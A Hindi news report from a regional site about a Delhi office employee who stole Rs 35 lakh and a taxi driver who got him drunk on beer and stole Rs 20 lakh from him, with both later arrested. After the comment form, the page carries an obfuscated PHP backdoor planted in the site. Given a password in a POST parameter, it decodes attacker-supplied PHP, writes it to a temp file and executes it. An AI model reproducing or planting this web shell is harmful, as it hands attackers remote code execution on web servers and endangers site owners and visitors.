Delhi: बीयर पिलाकर चोर के 20 लाख रुपये चुरा ले गया एक टैक्सी चालक, आखिर में दोनों पकड़े गये

Uttarakhand Press 13 October 2023: करोलबाग इलाके में मोबाइल स्क्रीन के कारोबारी का एक कर्मचारी उनके कार्यालय से 35 लाख रुपये लेकर फरार हो गया। तकनीकी जांच करते हुए पुलिस ने आरोपी को बाड़मेर से गिरफ्तार कर लिया। जांच में पता चला कि दिल्ली से राजस्थान ले जाने वाले टैक्सी चालक ने उसे बीयर पिलाकर उसके बैग से 20 लाख रुपये चुरा लिए। आरोपी के माध्यम से टैक्सी चालक की पहचान कर पुलिस ने उसे भी गिरफ्तार कर लिया है। इनके कब्जे से पुलिस ने 28 लाख रुपये, दो मोबाइल, दो सिम और एक इनोवा कार बरामद की है।

पांच अक्तूबर को करोलबाग के मोबाइल कारोबारी चमन देवास ने कार्यालय में चोरी होने की शिकायत की। उन्होंने आरोप लगाया कि उनका एक कर्मचारी सिरोही राजस्थान निवासी दिलीप पिछले चार महीने से उनके कार्यालय में काम कर रहा था। तीन अक्टूबर को दिलीप कार्यालय से 35 लाख रुपये चुराकर फरार हो गया है। उसने अपना मोबाइल फोन बंद कर दिया है। काफी तलाश के बाद उसके नहीं मिलने पर शिकायतकर्ता ने शिकायत दर्ज की। करोलबाग थाना पुलिस ने चोरी का मामला दर्ज कर जांच शुरू की। थाना प्रभारी दीपक मलिक के नेतृत्व में पुलिस टीम ने आरोपी के परिवार वालों के नंबर पर निगरानी बढ़ाई।

जांच के दौरान पुलिस को पता चला कि आरोपी ने जैसलमेर में एक नए मोबाइल नंबर से पत्नी से संपर्क किया है। पुलिस ने आरोपी के नए नंबर को सर्विलांस पर लगाया। इससे उसकी लोकेशन का पता चला। दिल्ली पुलिस ने राजस्थान के बाड़मेर की स्थानीय पुलिस से संपर्क किया और आरोपी के बारे में जानकारी साझा की। इस सूचना पर बाडमेर के धोरीमन्ना थाना पुलिस ने आरोपी को गिरफ्तार कर लिया। उसके कब्जे से पुलिस ने 10 लाख रुपये बरामद कर लिए।

लालच में आकर दिया वारदात को अंजाम:
आरोपी दिलीप ने बताया कि वह पिछले चार माह से करोलबाग में चमन देवास के मोबाइल स्क्रीन ट्रेडिंग कार्यालय में काम करता था। तीन अक्टूबर को उसने कार्यालय की अलमारी में 35 लाख रुपये देखे तो उसे लालच आ गया। उसने वह रुपये चुरा लिए। चोरी करने के बाद उसने करोल बाग से जयपुर के लिए एक टैक्सी किराए पर ले ली। रास्ते में उन्होंने अपने लिए एक आईफोन और टैक्सी ड्राइवर के लिए 40 हजार रुपये कीमत का एक सैमसंग फोन खरीदा। उसने एक नया सिम कार्ड भी लिया। इसके बाद उसने अपनी पत्नी से संपर्क किया। वह जयपुर, पाली, सैम और जैसलमेर सहित कई जगहों पर गया। इन जगहों पर उसने खाना, बीयर, नृत्य, होटल और टैक्सी सेवाओं पर करीब चार लाख रुपये खर्च किए।

टैक्सी चालक बैग से चुराए 20 लाख रुपये:
आरोपी ने बताया कि टैक्सी चालक ने उसे बियर पिलाई। नशा होने पर उसके बैग से 20 लाख रुपये चोरी कर लिए। आरोपी से टैक्सी चालक की जानकारी लेने के बाद एसआई साहिल और हवलदार छगन टैक्सी चालक की तलाश में जुट गए। पुलिस ने उसके नंबर के जरिए चालक रजनीश को गिरफ्तार कर लिया। पूछताछ में उसने बताया कि दिलीप को ले जाने के दौरान उसके बैग में काफी रकम देखी। उसने रास्ते में दिलीप के लिए तीन बियर खरीदी और उसे पिलाईं। नशा होने के बाद उसने दिलीप के बैग से 20 लाख रुपये चुरा लिए। पुलिस ने उसके निशानदेही पर 17.5 लाख रुपये और इनाेवा कार बरामद कर ली। पुलिस ने बताया कि रजनीश अशोक विहार फेज 4 इलाके में रहता है। उसके खिलाफ सराय रोहिल्ला थाने में जुआ अधिनियम का मामला दर्ज है।

Read Previous

Uttarakhand: केदारनाथ की हवाई यात्रा के नाम पर 1.15 लाख रुपये ठगे, चार और को लगाई चार लाख की चपत

Read Next

Uttarakhand Crime: आरोपित ने सात साल के बच्चे को अश्लील वीडियो दिखाकर किया दुष्कर्म, मामला दर्ज

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}